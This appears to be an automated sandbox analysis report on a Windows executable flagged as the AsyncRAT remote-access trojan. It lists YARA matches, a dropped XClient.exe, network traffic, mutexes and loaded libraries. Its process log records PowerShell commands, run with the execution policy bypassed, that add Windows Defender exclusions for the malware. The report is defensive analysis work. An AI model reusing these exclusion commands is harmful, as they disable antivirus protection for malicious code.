Source: powershell.exe, 00000001.00000002.1719420293.000001EFD1E02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1807558417.0000017B42B62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1955490947.000001F710072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2211113684.000001DFC4540000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49736 version: TLS 1.2

Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe

Process information set: 01 00 00 00

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: z0LTqIdZ4A.exe, type: SAMPLE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.z0LTqIdZ4A.exe.12be9ac0.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.z0LTqIdZ4A.exe.8e0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.z0LTqIdZ4A.exe.12be9ac0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.1655732431.00000000008E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.2935208445.0000000012BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Code function: 0_2_00007FFD9B897396	0_2_00007FFD9B897396
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Code function: 0_2_00007FFD9B89D634	0_2_00007FFD9B89D634
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Code function: 0_2_00007FFD9B89192F	0_2_00007FFD9B89192F
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Code function: 0_2_00007FFD9B898142	0_2_00007FFD9B898142
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD9B9630E9	4_2_00007FFD9B9630E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FFD9B9730E9	7_2_00007FFD9B9730E9
Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 13_2_00007FFD9B88192F	13_2_00007FFD9B88192F
Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 14_2_00007FFD9B88192F	14_2_00007FFD9B88192F

Source: z0LTqIdZ4A.exe, 00000000.00000000.1655758219.00000000008F4000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamenew pdf.exe, vs z0LTqIdZ4A.exe
Source: z0LTqIdZ4A.exe, 00000000.00000002.2935208445.0000000012BE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenew pdf.exe, vs z0LTqIdZ4A.exe
Source: z0LTqIdZ4A.exe	Binary or memory string: OriginalFilenamenew pdf.exe, vs z0LTqIdZ4A.exe

Source: z0LTqIdZ4A.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: z0LTqIdZ4A.exe, type: SAMPLE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.z0LTqIdZ4A.exe.12be9ac0.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.z0LTqIdZ4A.exe.8e0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.z0LTqIdZ4A.exe.12be9ac0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.1655732431.00000000008E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2935208445.0000000012BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: z0LTqIdZ4A.exe, 699hB8OpAkzLHY74ohXhmfCMlX15Hp2AJaZBoeZWB2xFbrRKHMzCVubFaJI.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: z0LTqIdZ4A.exe, 699hB8OpAkzLHY74ohXhmfCMlX15Hp2AJaZBoeZWB2xFbrRKHMzCVubFaJI.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: z0LTqIdZ4A.exe, 5J1ZtgxCAORpQkKfbtyjcdbtZuAbZbGkrUTzcLOjmFUgTWwxjCJihLKlHta.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: XClient.exe.0.dr, 699hB8OpAkzLHY74ohXhmfCMlX15Hp2AJaZBoeZWB2xFbrRKHMzCVubFaJI.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: XClient.exe.0.dr, 699hB8OpAkzLHY74ohXhmfCMlX15Hp2AJaZBoeZWB2xFbrRKHMzCVubFaJI.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: XClient.exe.0.dr, 5J1ZtgxCAORpQkKfbtyjcdbtZuAbZbGkrUTzcLOjmFUgTWwxjCJihLKlHta.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.z0LTqIdZ4A.exe.12be9ac0.0.raw.unpack, 699hB8OpAkzLHY74ohXhmfCMlX15Hp2AJaZBoeZWB2xFbrRKHMzCVubFaJI.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.z0LTqIdZ4A.exe.12be9ac0.0.raw.unpack, 699hB8OpAkzLHY74ohXhmfCMlX15Hp2AJaZBoeZWB2xFbrRKHMzCVubFaJI.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.z0LTqIdZ4A.exe.12be9ac0.0.raw.unpack, 5J1ZtgxCAORpQkKfbtyjcdbtZuAbZbGkrUTzcLOjmFUgTWwxjCJihLKlHta.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: z0LTqIdZ4A.exe, YCV7ab2LPxaLuviIDS5novDiuRrngLAO3wQF91AQHf.cs	Base64 encoded string: 'gJvcaXqeWOGJ18mkOdKaFc7xsG9gUwMow+25kD161vnloJ3+qlrVXfVbbSljlUhV', 'k3Cd5oOcgNF0xg5Thqk5eOTw9C643tdnp7CVmzZDSZQDogjaBt9PKHWPc1bfnB0Z', 'lSugPdSWJT50aemTBq8SeqifQWt3uHoxvHKPH1fJ0eMU82QrQWNJHWGeINWwiC7k', 'rGoRKy/le0WD5aFZH18u9u6LniYT3B2NaI2WA9ofLgjZqmquoFnNyeg/Hd+9vjmK'
Source: XClient.exe.0.dr, YCV7ab2LPxaLuviIDS5novDiuRrngLAO3wQF91AQHf.cs	Base64 encoded string: 'gJvcaXqeWOGJ18mkOdKaFc7xsG9gUwMow+25kD161vnloJ3+qlrVXfVbbSljlUhV', 'k3Cd5oOcgNF0xg5Thqk5eOTw9C643tdnp7CVmzZDSZQDogjaBt9PKHWPc1bfnB0Z', 'lSugPdSWJT50aemTBq8SeqifQWt3uHoxvHKPH1fJ0eMU82QrQWNJHWGeINWwiC7k', 'rGoRKy/le0WD5aFZH18u9u6LniYT3B2NaI2WA9ofLgjZqmquoFnNyeg/Hd+9vjmK'
Source: 0.2.z0LTqIdZ4A.exe.12be9ac0.0.raw.unpack, YCV7ab2LPxaLuviIDS5novDiuRrngLAO3wQF91AQHf.cs	Base64 encoded string: 'gJvcaXqeWOGJ18mkOdKaFc7xsG9gUwMow+25kD161vnloJ3+qlrVXfVbbSljlUhV', 'k3Cd5oOcgNF0xg5Thqk5eOTw9C643tdnp7CVmzZDSZQDogjaBt9PKHWPc1bfnB0Z', 'lSugPdSWJT50aemTBq8SeqifQWt3uHoxvHKPH1fJ0eMU82QrQWNJHWGeINWwiC7k', 'rGoRKy/le0WD5aFZH18u9u6LniYT3B2NaI2WA9ofLgjZqmquoFnNyeg/Hd+9vjmK'

Source: 0.2.z0LTqIdZ4A.exe.12be9ac0.0.raw.unpack, clLfMovJ7EyWpP1YZLBn4SpCUCHKawgTDSn01nJ9Jt.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.z0LTqIdZ4A.exe.12be9ac0.0.raw.unpack, clLfMovJ7EyWpP1YZLBn4SpCUCHKawgTDSn01nJ9Jt.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: z0LTqIdZ4A.exe, clLfMovJ7EyWpP1YZLBn4SpCUCHKawgTDSn01nJ9Jt.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: z0LTqIdZ4A.exe, clLfMovJ7EyWpP1YZLBn4SpCUCHKawgTDSn01nJ9Jt.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: XClient.exe.0.dr, clLfMovJ7EyWpP1YZLBn4SpCUCHKawgTDSn01nJ9Jt.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: XClient.exe.0.dr, clLfMovJ7EyWpP1YZLBn4SpCUCHKawgTDSn01nJ9Jt.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.evad.winEXE@15/20@1/2

Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe

File created: C:\Users\user\AppData\Roaming\XClient.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\XClient.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4280:120:WilError_03
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Mutant created: \Sessions\1\BaseNamedObjects\HjkNz5e3InE8tEod
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7564:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ztu1i5bc.tyl.ps1

Jump to behavior

Source: z0LTqIdZ4A.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: z0LTqIdZ4A.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: z0LTqIdZ4A.exe	ReversingLabs: Detection: 84%
Source: z0LTqIdZ4A.exe	Virustotal: Detection: 81%

Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe

File read: C:\Users\user\Desktop\z0LTqIdZ4A.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\z0LTqIdZ4A.exe "C:\Users\user\Desktop\z0LTqIdZ4A.exe"
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\z0LTqIdZ4A.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'z0LTqIdZ4A.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe"
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\z0LTqIdZ4A.exe'	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'z0LTqIdZ4A.exe'	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'	Jump to behavior

Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
